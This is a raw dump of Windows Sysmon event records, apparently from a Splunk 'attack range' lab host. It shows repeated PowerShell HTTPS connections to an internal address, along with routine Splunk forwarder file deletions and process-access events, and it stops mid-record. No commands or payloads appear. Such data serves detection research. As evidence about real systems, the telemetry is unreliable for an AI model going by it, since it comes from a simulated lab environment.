22:01:38.415{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62237-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:37.245{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62236-false10.0.1.12-8000- 23542300x800000000000000035129126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:13.292{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26EDBEBC5F7CF474A294419E230F6A47,SHA256=987E04A9860A6EC4BFA7DB2952E9C6DC2BA10180F965321D205940CA48B8E554,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:13.264{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C7C67B9C8DABE48788FCA862079319CA,SHA256=072E83EAE8F5967966F4F32082E5888E5DD153ED92F54BA9809E4AC92E2ADF0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:14.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8CD0A4047CDF680ADA38044F1544A0E3,SHA256=3D55E912440FE1AA16288164CCEA35C54D206A2EBAC74014BB95A1D7270867E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:14.306{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA425C1D6D6F0D9307AFA15C1AF6881F,SHA256=680363803FBCF102625942C48D3DB1D7F63C9CFB350D3C1EE899D131F0A46466,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:15.387{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A3021C38A3ED6DC9C9929B31E6F0601,SHA256=1479EFBCEBD66AA4B0D2D29BB5CC5EDE22577A3C6B6A0B61DE01714370D03151,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.272{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62239-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:16.408{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7659025C568BE96BDE7AC02EEC047AA5,SHA256=E103149D6CDFF173B7FA44078F991AB35E88FBDB54202FE052FF3CBED4C2679C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:42.271{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62240-false10.0.1.12-8000- 23542300x800000000000000035129135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:17.455{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3C35325E3BB8E6027109696ED4E56D6,SHA256=6D23C4B27EB5657B3FC34B5054F905AD3A4B8C5075EE65687A4A452108E254C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:18.458{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D305077D56D0D534EBAF7A4E5F7BB8,SHA256=F65B8E0055495F2CB077E0BE3B687B309FA5540EB4AE4B3714353FFB093A17B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:44.288{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62241-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:19.474{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11FD3D855F0ECD99EF968EBB724AF829,SHA256=A01E5E18246FCCF33F1F1F9D402FC7391E91E03C07E0011E6D703910ACE50776,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:19.343{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6A83FEC35225675162F90FCBE1DB3F2D,SHA256=2D62DDC921709CA0954CABA73CF6B955C08248A889510BFBE045EEC5AA06C3C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:20.489{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE8B180FFF1ED7EC99A36A09525B979B,SHA256=8376A4BCAB9467972B6E91FDEF5D077B03B3876E1B6C755A717E4BD17DCC005D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:21.506{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF859FC905B535204075F2F678972C5C,SHA256=7468B4E336BED2F91BFB57F0C8ECFBEAB7D69693CB9214EC34BD976779876ED5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:22.557{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653C494F3CA5885A9FAAD79466CFBCE2,SHA256=E133BD2C0491258DB18FC82DA3D28C30FE04C3608AE311CE6E6731DB3AB6A147,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:23.574{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C406D35BB277E0B493677C8F55EF2D93,SHA256=9ACF20032CC1755CA2000CD9FAE51A9B28B3338184DE8B10025DD4120E889788,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:47.410{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62242-false10.0.1.12-8000- 23542300x800000000000000035129147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:24.589{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26705DEB47E584385F62C39FCD15DC2D,SHA256=2F2311E64C0669ABFF504C214AA0BF924A61F5A1A2AA72D88AD66112D243585A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:24.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B39717B08560A5E9F2CE6495BACB9B61,SHA256=5A134546CEF0DB2BCA6BF14EBD4B0E80438A2FB871A46EE4282EF5EBF2BCB9C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:25.606{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC6610C20FFA1F98ED5D4E9513B04C7C,SHA256=77E3953C908F69963F4DBBEFB0CE5A3DC4D386F8CEDD25880AE9A8AE85FD6FE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:49.310{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62243-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035129158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.871{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8436-613A-F396-03000000C801}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.871{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.871{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.871{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.871{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.871{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8436-613A-F396-03000000C801}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.871{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8436-613A-F396-03000000C801}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.857{B81B27B7-8436-613A-F396-03000000C801}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:26.624{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B77695DFCF49AD2C84234D549F66BADE,SHA256=9FD91E926956DCDC84971B7A7043470CD91A7EACD4E87D9866CF2ECF78F3411D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD7BAA0C1975D7CB3A5CBB96351C3B8A,SHA256=36EFE1FA4CD59F9D06C9D890F8B03358A7C2982623E63C33C4307E2CB469EF8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C5C16A4586798CEE323BC8C47A4FF73,SHA256=E03E3A64B972DA76C591F989DBFEBED22CB7855A0780AEDC080F1AA345CB3AA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.723{B81B27B7-8437-613A-F496-03000000C801}64604176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.639{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3DFF8195DCFBCC8AAFDF49E4666850A,SHA256=C81DB5AC3FE2D4F968EF9FE50B2D7969D55DE44CC648319D3B21FDB2A64C861D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.570{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8437-613A-F496-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.570{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.570{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.570{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 